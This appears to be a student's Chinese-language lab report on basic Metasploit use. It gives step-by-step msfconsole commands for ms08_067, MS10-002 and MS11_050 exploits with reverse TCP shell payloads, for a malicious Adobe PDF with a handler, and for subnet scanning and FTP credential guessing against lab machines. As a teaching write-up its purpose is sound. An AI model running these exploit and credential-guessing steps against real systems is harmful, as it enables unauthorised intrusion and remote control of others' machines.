20155227《网络对抗》Exp5 MSF基础应用
20155227《网络对抗》Exp5 MSF基础应用
基础问题回答
用自己的话解释什么是exploit,payload,encode
exploit:把实现设置好的东西送到要攻击的主机里。
payload:用来攻击的代码、程序等。
encode:编码方式,让被传输的东西变得更不易被发现。
实验步骤
1.主动攻击:ms08_067
- 首先,先用
search ms08_067
查询一下针对该漏洞的攻击模块:
- 用
use exploit/windows/smb/ms08_067_netapi
使用该模块 - 输入命令
show payloads
会显示出有效的攻击载荷
- 使用命令
set payload generic/shell_reverse_tcp
设置攻击有效载荷 - 输入命令
set LHOST "kali Ip"
set RHOST "Win xp Ip"
- 使用命令
show options
查看payload
状态
- 输入命令
exploit
开始攻击,攻击成功
- 在kali上执行
ipconfig/all
:
- 在win xp上执行
ipconfig/all
:
发现二者结果相同,说明成功攻击.
还可以进行MS08_067
远程漏洞攻击实践:meterpreter
:
2.对浏览器攻击:MS11_050漏洞渗透攻击/MS10-002漏洞攻击
- 先利用
search ms11_050
指令查看可以运用的攻击模块 - 使用
use windows/browser/ms11_050_mshtml_cobjectelement
模块: - 用
info
查看该模块的信息:
- 用
set payload windows/meterpreter/reverse_tcp
设置payload
,并设置需要设置的参数。
- 用
show options
确认需要设置的参数是否已经设置好:
- 确认参数设置无误后,用
exploit
指令开始攻击,攻击成功后会有靶机需要访问的网址:
- 在靶机IE上输入该网址出现
404not found
的错误:
因为靶机上的IE版本不符合可攻击的版本,所以无法攻击成功。
之后换成了狄惟佳同学提供的IE,在IE中输入网址,查看内容:
但是很快,IE出现弹窗,警告遇到问题需关闭程序。
之后我又尝试了win7下的IE8,也是同样的结果,一输入网址IE就自动关闭。参考了狄同学的博客,修改了IE的安全设置,结果还是不行。
- 我又尝试了成功攻击的同学使用的方法:
MS10-002漏洞攻击
,同样设置参数后exploit
,在靶机IE中输入网址,此时kali中可以看到有目标主机上线,会话建立。
- 输入
sessions -i 1
,成功获取靶机的shell
,可以对其进行操作:
3.针对客户端的攻击:adobe_toolbutton
- 在kali终端中开启
msfconsole
- 输入命令
use exploit/windows/fileformat/adobe_cooltype_sing
,进入该漏洞模块的使用 - 使用命令
set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷 - 设置相关数据:
show options
:
- 输入
exploit
,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里:
- 使用
use exploit/multi/handler
新建监听模块(和前几次实验一样)
- 使用命令
exploit
开始攻击,在靶机中打开pdf,攻击成功:
4.成功应用任何一个辅助模块
4.1 scanner/http/dir_scanner
- 用
show auxiliary
查看所有辅助模块,并选择其中的一个,我使用的是scanner/http/dir_scanner
扫描网站目录。 - 查看需要设置的参数,设置完成后确认一下,然后就可以开始
exploit
了: - 可以进行对单一目标主机的扫描,也可以对指定网段的主机进行扫描:
4.2 auxiliary/scanner/ftp/ftp_login
- 选择
ftp_login
模块,扫描网段192.168.115.1-10
中能使用固定用户名和密码root/123456
登陆主机:
- 查看输出结果,可以看出在这10个IP中没有FTP Server使用
root/123456
账号登陆。通常在公司或学校内网里,很多人习惯使用简单的账号,没有足够的安全意识,当攻击者成功入侵内网后,这些工作站将非常危险。
离实战还缺些什么技术或步骤?
实战的时候要结合靶机的具体环境考虑。
实验体会
Metasploit提供了丰富的扫描功能、攻击脚本及二次开发的平台,使网络安全漏洞检测变得相对容易。在这次实验过程中我走的弯路较少。具体来说就是先寻找可攻击的漏洞、再根据漏洞名和所属目录猜测漏洞攻击的方面、再查看漏洞的详细信息、再设置一系列参数、最后实施攻击并查看攻击结果。
转载于:https://www.cnblogs.com/guyanlin/p/8876851.html
20155227《网络对抗》Exp5 MSF基础应用相关推荐
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 网络对抗 Exp5 MSF基础应用 20154311 王卓然
Exp5 MSF基础应用 1. 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067: 1.2 一个针 ...
- 20145240《网络对抗》MSF基础应用
MSF基础应用 一个主动攻击,如ms08_067 启动msf search ms08_067,查找相应的漏洞,查询可攻击的模块. 根据上述漏洞的模块use exploit/windows/smb/ms ...
- 《网络对抗》Exp5 MSF基础应用
20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...
- 2017-2018-2 20155314《网络对抗技术》Exp5 MSF基础应用
2017-2018-2 20155314<网络对抗技术>Exp5 MSF基础应用 目录 实验内容 实验环境 基础问题回答 预备知识 实验步骤--基于Armitage的MSF自动化漏洞攻击实 ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...
- 2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165332<网络攻防技术>Exp5 MSF基础应用 1.基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是 ...
- Exp5 MSF基础应用 20164323段钊阳
网络对抗技术 20164323 Exp5 MSF基础应用 靶机 ip:192.168.1.229 kali ip:192.168.1.216 exploit选取 主动攻击:ms17_010_psexe ...
最新文章
- 面试官:你分析过mybatis工作原理吗?
- 详解mybatis的配置setMapperLocations多个路径两种方法
- iBatis 到 MyBatis区别
- _Linux自编译云锁Web网站防火墙,看完小白也能保护网站安全
- 让所有连接都弹出新窗口
- 操作系统知识点_内存管理
- object references an unsaved transient instance - save the transient instance before flushing
- java编译命令是什么_java编译命令,java的编译命令是什么?
- linux退出热键_LINUX常用快捷键
- HTML5内嵌文本编辑器(H5文本编辑器 俗称手机版网站专用)
- oracle 同义词循环连,Oracle出现ORA-01775: 同义词的循环链问题
- C语言扫雷游戏代码以及基本原理教学(一看就会)
- 南京IT行业企业比较
- 2022年四川二级建造师建设工程法规及相关知识《解决建设工程纠纷法律制度》练习及答案
- sourcetree安装教程, sourtree新手入门 sourcetree使用教程 (不用太详细, 毕竟工作中用不到那么多, 就熟练使用常用的即可)
- python的openpyxl模块合并单元格,浅谈openpyxl库,遇到批量合并单元格的问题
- 理解left join的多次连续使用
- Matlab 基础04 - 冒号Colon operator “:”的使用和复杂应用详析
- 我的减肥经历和一些经验[1]
- 目标检测 | 让YOLOv2告诉你Trick的力量